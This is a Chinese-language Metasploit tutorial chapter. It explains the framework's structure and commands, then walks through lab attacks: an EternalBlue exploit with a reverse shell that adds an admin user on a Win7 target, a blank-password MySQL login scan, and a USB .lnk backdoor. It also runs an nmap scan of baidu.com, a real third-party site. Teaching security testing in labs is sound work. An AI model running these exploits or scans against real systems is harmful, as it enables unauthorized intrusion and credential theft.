07、Metasploit渗透测试框架的基本使用

7.1 Metasploit 渗透测试框架介绍

7.2 Metasploit 基本使用方法

7.4 实战-使用 msf 渗透攻击 Win7 主机并远程执行命令

7.5 实战-使用 msf 扫描靶机上 mysql 服务的空密码

7.1 Metasploit 渗透测试框架介绍

7.1.1 Metasploit 体系框架

1、基础库：metasploit 基础库文件位于源码根目录路径下的 libraries 目录中，包括Rex,framework-core 和 framework-base 三部分。
Rex 是整个框架所依赖的最基础的一些组件，如包装的网络套接字、网络应用协议客户端与服务端实现、日志子系统、渗透攻击支持例程、PostgreSQL 以及 MySQL 数据库支持等；
framework-core 库负责实现所有与各种类型的上层模块及插件的交互接口；
framework-base 库扩展了 framework-core，提供更加简单的包装例程，并为处理框架各个方面的功能提供了一些功能类，用于支持用户接口与功能程序调用框架本身功能及框架集成模块；

2、模块：模块组织按照不同的用途分为 6 种类型的模块（Modules）：
分为辅助模块（Aux)、渗透攻击模块（Exploits)、后渗透攻击模块（Post)、攻击载荷模块（payloads)、编码器模块（Encoders)、空指令模块（Nops)。
注：payload 又称为攻击载荷，主要是用来建立目标机与攻击机稳定连接的，可返回 shell，也可以进行程序注入等。

3、插件：插件能够扩充框架的功能，或者组装已有功能构成高级特性的组件。插件可以集成现有的一些外部安全工具，如 Nessus、OpenVAS 漏洞扫描器等，为用户接口提供一些新的功能。

4、接口：包括 msfconsole 控制终端、msfcli 命令行、msfgui 图形化界面、armitage 图形化界面以及 msfapi 远程调用接口。

5、功能程序： metasploit 还提供了一系列可直接运行的功能程序，支持渗透测试者与安全人员快速地利用 metasploit 框架内部能力完成一些特定任务。比如 msfpayload、msfencode 和msfvenom 可以将攻击载荷封装为可执行文件、C 语言、JavaScript 语言等多种形式，并可以进行各种类型的编码。

7.1.4 Metasploit 目录结构

切换到 Metasploit 工作目录

cd /usr/share/metasploit-framework
ls
1
2

data：Metasploit 使用的可编辑文件
documentation：为框架提供文档
lib：框架代码库
modules：实际的 MSF 模块
plugins：可以在运行时加载的插件
scripts：Meterpreter 和其他脚本
tools：各种有用的命令行工具
1
2
3
4
5
6
7

7.2 Metasploit 基本使用方法

Metasploit 基本命令
Metasploit 程序需要使用 Postgresql 数据库。
Postgresql 概述：
PostgreSQL 是一种特性非常齐全的自由软件的对象-关系型数据库管理系统（ORDBMS），是以加州大学计算机系开发的 POSTGRES 4.2 版本为基础的对象关系型数据库管理系统。
官网：https://www.postgresql.org/

注：PostgreSQL：世界上最先进的开源关系数据库

扩展：PostgreSQL 和 MySQL 数据的应用场景区别：
从应用场景来说，PostgreSQL 更加适合严格的企业应用场景（比如金融、电信、ERP、CRM），而MySQL 更加适合业务逻辑相对简单、数据可靠性要求较低的互联网场景

systemctl start postgresql
systemctl enable postgresql    #设置成开机启动数据库，我们要经常用
1
2

msfconsole
1

启动完成后会有一些统计信息，比如说版本号，有多少个 exploits，多少个 payloads 等。

help              #查看帮助信息。
1

注：通过 help 查看帮助，可以对 msf 有个整体认识，可以看到 msf 相关命令可以分成以下类型：
Core Commands #核心命令
Module Commands #模块命令
Job Commands #后台任务命令
Resource Script Commands #资源脚本命令
Database Backend Commands #数据库后端命令
Credentials Backend Commands #证书/凭证后端命令
Developer Commands #开发人员命令

我们下面讲解一下我们常用的命令。
1、核心命令中的 connect 命令
connect 命令主要用于远程连接主机。一般用于内网渗透。比较常用的命令就是“connect 192.168.42.138 80”
192.168.42.138 是 IP 地址 80 是端口号。

查看 connect 命令参数：

connect
1

connect 192.168.42.138 80
get           #提交一个 get 请求，可以查看到服务器版本号
1
2

2、模块相关的命令 show 使用方法
show 命令用的很多。
“show”命令的有效参数是：all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options

例 1：列出 metasploit 框架中的所有渗透攻击模块 exploits。

show exploits
1

#列出 metasploit 框架中的所有渗透攻击模块。该命令列出数据较多，较为耗费时间。

show payloads       #列出 metasploit 框架中的所有攻击载荷。
1

show auxiliary       #列出 metasploit 框架中的所有辅助攻击载荷。
1

3、模块相关的命令 search 搜索的使用方法
当你使用 msfconsole 的时候，你会用到各种漏洞模块、各种插件等等。所以 search 搜索命令就很重要。
当你输入 search –h 会列出 search 命令的一些选项。

search -h
1

Usage: search [ options ] #search 后主要加选项和关键字

例 1：通过 name 关键字进行查找
这里需要用到 name：命令。

search mysql      #search 后直接跟要查找内容，查得很广泛。只有当你对漏洞名字很描述很清楚时，使用这个方法
1

例：先查找出自己想要的 ms08_067 漏洞模块。

search ms08_067
1

语法：Search Keywords 参数：关键字

search name:mysql      #要查找 mysql 数据库的漏洞
1

每列的含意是：

#   Name Disclosure Date Rank Check Description
编号 名称   披露日期           排名  检查  说明
1
2

Disclosure [dɪsˈkləʊʒə(r)] 揭露;透露;公开; rank [ræŋk] 等级 ，rank 通常用来描述漏
洞级别
1
2

每一个漏洞利用模块基于它们对目标系统的潜在影响都被标记了一个 Rank 字段。
用户可以基于 Rank 对漏洞利用模块进行搜索，分类以及排序。

Rank 按照可靠性降序排列：
excellent 漏洞利用程序绝对不会使目标服务崩溃，就像 SQL 注入、命令执行、远程文件包含、本地文件包含等等。除非有特殊情况，典型的内存破坏利用程序不可以被评估为该级别。
great 该漏洞利用程序有一个默认的目标系统，并且可以自动检测适当的目标系统，或者在目标服务的版本检查之后可以返回到一个特定的返回地址。
good 该漏洞利用程序有一个默认目标系统，并且是这种类型软件的“常见情况”（桌面应用程序的Windows 7，服务器的 2012 等）
normal 该漏洞利用程序是可靠的，但是依赖于特定的版本，并且不能或者不能可靠地自动检测。
average 该漏洞利用程序不可靠或者难以利用。
low 对于通用的平台而言，该漏洞利用程序几乎不能利用（或者低于 50% 的利用成功率）
manual 该漏洞利用程序不稳定或者难以利用并且基于拒绝服务（DOS）。如果一个模块只有在用户特别配置该模块的时候才会被用到，否则该模块不会被使用到，那么也可以评为该等级。

例 2：通过路径进行查找
有时候，我们只记得模块的路径，但是却忘记了模块的名称。那么就可以用 path：命令查找在该路径下的所有模块。如果我要 mysql 路径下的所有 mysql 利用模块，那么就输入：

search path:mysql
1

例 3：缩小查询范围
关键字：platform [ˈplætfɔːm] 平台
作用： Modules affecting this platform 即：列出可以影响此平台的模块，也就是比较好的漏洞
有时候我们会搜索到大量的模块，那么可以用 platform：命令来缩小查询范围。使用 platform 命
令后，所查询的结果会列出 rank 比较高的模块。如果我要查找 mysql 的漏洞，那么输入：

search platform:mysql
1

注：大家对比一下上面的截图，发现没有，所有 rank 为 normal 的模块全部都屏蔽了，只剩下几个
比较高级的利用模块。

例 4：通过类型进行查找
这里要使用到 type：命令。
type : 特定类型的模块(exploit, payload, auxiliary, encoder, evasion, post, or nop)
要搜索 exploit 模块，那么就输入：

search type:exploit
1

例 5：联合查找
大家可以使用上面的参数自行搭配使用。如果我要查找 mysql 的 exploit 相关漏洞。那么输入:

search name:mysql type:exploit
1

注：MySQL yaSSL CertDecoder::GetName Buffer Overflow 的意思是：
mysql yassl certdecoder:：getname 缓冲区溢出漏洞

例 6：根据 CVE 搜索 exploit 相关模块
CVE 概述：CVE 的英文全称是“Common Vulnerabilities & Exposures”公共漏洞和暴露。
CVE 就好像是一个字典表，为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。使用一个共同的名字，可以帮助用户在各自独立的各种漏洞数据库中和漏洞评估工具中共享数据，虽然这些工具很难整合在一起。这样就使得 CVE 成为了安全信息共享的“关键字”。如果在一个漏洞报告中指明的一个漏洞，如果有 CVE 名称，你就可以快速地在任何其它 CVE 兼容的数据库中找到相应修补的信息，解决安全问题。
Vulnerabilities [ˌvʌlnərəˈbɪlɪtiz] 脆弱性;弱点 ； Exposures [ɪksˈpəʊʒəz] 暴露;曝光

事情背景：

2017 年 GitHub 上公开了 CVE-2017-8464 漏洞的 metasploit-framework 利用模块。利用此模块在Windows 10 x64 (Build 14393)版本上测试有效。

通过执行 cve_2017_8464_lnk_rce.rb 模块，将生成大量的.lnk 文件（对应盘符从 D 到 Z）和要加载的.dll 文件（后门文件）。将所有样本文件拷到 U 盘里，然后将 U 盘插到 Windows7 机器上，默认自动执行，样本执行成功将反弹回一个 Session，从而可以让我们可以远程执行命令。

查找：CVE-2017-8464 远程命令执行漏洞

search cve:CVE-2017-8464 type:exploit
1

search cve:2020 name:linux
1

#查找 2020 年 linux 相关的漏洞模块

搜索参数可以组合使用，可以更精准的查询到对应的模块。

3、模块相关的命令 use 的使用方法
use 使用参数。如你要使用到某个模块，就要使用到 use 命令
语法：use 模块的名字

实战背景：
2008 年微软爆出 ms08_067 漏洞，如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上，攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。

（1）、先查找出自己想要的 ms08_067 漏洞模块。

search ms08_067
1

search ms08_067 #使用下划线
search ms08-067 #使用减号
search MS08-067 #使用大写字母 MS
1
2
3

结果是一样，metasploit 支持模糊查找，不区分大小写，这样大家查找时更方便

（2）、装载一个渗透攻击模块

use exploit/windows/smb/ms08_067_netapi
1

我们可以看到使用 use 装载模块后我们的 bash 提示符会变成对应的模块信息。稍后我们使用这个模块进行攻击。

back         #back 退出当前调用的模块
1

3、模块相关的命令 info 的使用方法
info ：显示模块的相关信息。

info 模块名称

info exploit/windows/smb/ms08_067_netapi
1

方法 2：use 装载模块后直接使用 info

 use exploit/windows/smb/ms08_067_netapi
 info
1
2

从弹出的消息中，需要重点关注的内容是：
（1）、可用目标，就是查看可以攻击哪些操作系统

（2）、Basic options: 调用漏洞需要的相关参数

（3）、漏洞描述和执行过程：

（4）、参考文档

方法 2：使用 show 命令查看模块的相关信息

show options            #查看模块的选项
1

show targets           #查看可以攻击哪些操作系统
1

设置 RHOSTS 参数，指定攻击的目标机器

 set RHOSTS 192.168.42.137
1

show options        #查看设置的值
1

配置好了之后我们输入 exploit 或 run 就可以执行该模块。

back     #使用 back 即可退出装载的模块
1

注：不要使用 exit，exit 会直接退出 Metasploit 程序

7.4 实战-使用 msf 渗透攻击 Win7 主机并远程执行命令

7.4.2 通过 msf 模块获取 Win7 主机远程 shell

模块的整体使用流程如下

我们先扫描目标是否存在 ms17-010 漏洞

search ms17-010
1

使用 use 命令选中这个模块

use auxiliary/scanner/smb/smb_ms17_010
1

查看模块需要配置的信息

show options
1

需要我们配置 RHOST 主机 IP

set rhosts 192.168.42.137
1

开始扫描

run
1

目标看起来易受攻击，也就表示可能存在相关漏洞。

查找攻击模块

search ms17-010
1

使用 use 命令加载模块

use exploit/windows/smb/ms17_010_eternalblue
show options
1
2

设置目标主机 IP

 set RHOSTS 192.168.42.137
1

查看 exploit target 目标类型:

show targets
1

可以看到这个模块只有一个 target，所以默认就选择这个目标系统。不需要手动设置。

我们已经配置好漏洞相关参数了，接下来应该做什么？

找一个 payload，获取 shell 远程连接权限后，进行远程执行命令，由于模块加载的时候默认指定了一个 payload

show options
1

如果不想使用默认指定的 payload，可以自己找一个 payload

search windows/x64/shell type:payload
1

注：payload 又称为攻击载荷，主要是用来建立目标机与攻击机稳定连接的，可返回 shell，也可以进行程序注入等。
我们挑选一个反弹 shell 的 payloads

注：设置的时候 payload 和 windows 之间有空格。

set payload windows/x64/shell/reverse_tcp
1

查看一下 payloads 需要配置什么信息

show options               #查看加载到的payload 信息
1

设置一下本机 payload 监听地址

set lhost 192.168.42.128
1

配置完成后开始执行，exploit [ɪkˈsplɔɪt 运用;利用;

exploit
1

注：如果等待没有出现 shell 提示符可以敲一下回车。

直接执行的话会获得目标主机的 SEHLL
使用 DOS 命令创建用户

net user admin admin /add
1

显示乱码但是已经添加成功
拓展：解决乱码问题（乱码是因为 windows 和 linux 的编码不一样导致的）

chcp 65001      #查看用户
1

net user
1

可以看到新建的用户已经创建成功。
查看拿到的用户权限

whoami
1

关闭链接 Ctrl+c
Abort session 1? [y/N] y

实战：通过会话进行连接目标机

exploit -j 
1

-j 表示后台执行 渗透目标完成后会创建一个 session 我们可以通过 session 连接目标主机。

sessions
1

通过会话 Id 进入会话

sessions -i 2
1

退出会话将会话保存到后台

background
1

sessions
1

根据会话 Id 结束会话

sessions -k 2
sessions
1
2

总结使用 metasploit 攻击的步骤：
1、查找 CVE 公布的漏洞
2、查找对应的 exploit 模块
3、配置模块参数
4、添加 payload 后门
5、执行 exploit 开始攻击

7.5 实战-使用 msf 扫描靶机上 mysql 服务的空密码

7.5.1 实战-使用 msf 扫描靶机上 mysql 服务的空密码

登录 Kali 开始搜索模块

search mysql_login
1

加载模块

use auxiliary/scanner/mysql/mysql_login
1

查看模块配置项

show options
1

我们配置要爆破的用户

set USERNAME root
1

参数：BLANK_PASSWORDS 含意：Try blank passwords for all users #为所有用户尝试空密码 。 blank [blæŋk] 空白的

开启为所有用户尝试空密码

set BLANK_PASSWORDS true
1

设置目标主机

set RHOSTS 192.168.42.138
1

配置完成以后我们执行 run 或者 exploit

exploit
1

执行成功

使用后端凭证命令 creds ， 列出数据库中的所有凭据

Credentials [krəˈdenʃlz] 凭证;证书;

creds
1

7.5.2 将扫描的结果导出 Metasploit 与导入另一台机器的 Metasploit 中

数据库后端命令：
db_connect 连接到现有的数据库
db_disconnect 断开与当前数据库实例的连接
db_export 导出包含数据库内容的文件
db_import 导入扫描结果文件（文件类型将被自动检测）

例 1：将前面扫描 mysql 数据库空密码信息导出

db_export -f xml /root/bak.xml
1

注：导出只支持两种格式：xml 和 pwdump

常用的导出格式为 xml

导出以后退出程序

exit
1

例 2：将扫描的结果导入另一台机器的 Metasploit 中

我们就不再开一台新 Kali，直接重置数据库，当成新的来用

msfdb reinit
1

连接 Metasploit

msfconsole
1

hosts
1

数据库中主机信息是空的，我们导入数据

db_import /root/bak.xml
1

hosts
1

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jQmwMGq0-1662080822770)(07、Metasploit渗透测试框架的基本使用.assets/71.png)]

hosts 命令有多个选项，通过 hosts -h 可以查看

 hosts -h
1

在这里，最重要的是选项 -c，此选项使我们能够选择要用 hosts 命令显示的数据的列或字段（类似于 SQL 中的 select 命令）。在上图中可以看到显示的可用列。

例：显示指定列的主机信息

hosts -c address,name,os_name
1

删除指定主机

hosts -d 192.168.1.138
1

除此之外我们还可以直接将 NMAP 的扫描结果导入到 Metasploit 数据库中我们新开一个终端窗口来进行扫描。

nmap -A baidu.com -oX baidu.xml
1

-oX 将扫描信息导出到 XML 文件中

我们回到 Metasploit 导入扫描结果

db_import /root/baidu.xml
1

hosts
1

查看我们数据库中的主机都开放了哪些服务

services
1

显示指定主机的服务信息

services -R 101.200.128.35
1

扩展：
在 msf 命令提示符下输入 help 后，显示的命令列表和作用描述。

核心命令

？ 帮助菜单
banner 显示一个 metasploit 横幅
cd 更改当前的工作目录
color 切换颜色
connect 连接与主机通信
exit 退出控制台
get 获取特定于上下文的变量的值
getg 获取全局变量的值
grep grep 另一个命令的输出 如： grep creds help
help 帮助菜单
history 显示命令历史
irb 进入 irb 脚本模式
load 加载一个框架插件
quit 退出控制台
route 通过会话路由流量
save 保存活动的数据存储
sessions 转储会话列表并显示有关会话的信息
set 将特定于上下文的变量设置为一个值
setg 将全局变量设置为一个值
sleep 在指定的秒数内不做任何事情
spool 将控制台输出写入文件以及屏幕
threads 线程查看和操作后台线程
unload 卸载框架插件
unset 取消设置一个或多个特定于上下文的变量
unsetg 取消设置一个或多个全局变量
version 显示框架和控制台库版本号

模块命令

advanced 显示一个或多个模块的高级选项
back 从当前上下文返回
edit 使用首选编辑器编辑当前模块
info 显示有关一个或多个模块的信息
loadpath 路径从路径搜索并加载模块
options 显示全局选项或一个或多个模块
popm 将最新的模块从堆栈中弹出并使其处于活动状态
previous 将之前加载的模块设置为当前模块
pushm 将活动或模块列表推入模块堆栈
reload_all 从所有定义的模块路径重新加载所有模块
search 搜索模块名称和描述
show 显示给定类型的模块或所有模块
use 按名称选择模块

工作命令

handler 作为作业启动负载处理程序
jobs 显示和管理作业
kill 杀死一个工作
rename_job 重命名作业

资源脚本命令

makerc 保存从开始到文件输入的命令
resource 运行存储在文件中的命令

数据库后端命令

db_connect 连接到现有的数据库
db_disconnect 断开与当前数据库实例的连接
db_export 导出包含数据库内容的文件
db_import 导入扫描结果文件（文件类型将被自动检测）
db_nmap 执行 nmap 并自动记录输出
db_rebuild_cache 重建数据库存储的模块高速缓存
db_status 显示当前的数据库状态
hosts 列出数据库中的所有主机
loot 列出数据库中的所有战利品
notes 列出数据库中的所有笔记
services 列出数据库中的所有服务
vulns 列出数据库中的所有漏洞
workspace 在数据库工作区之间切换

凭证后端命令

creds 列出数据库中的所有凭据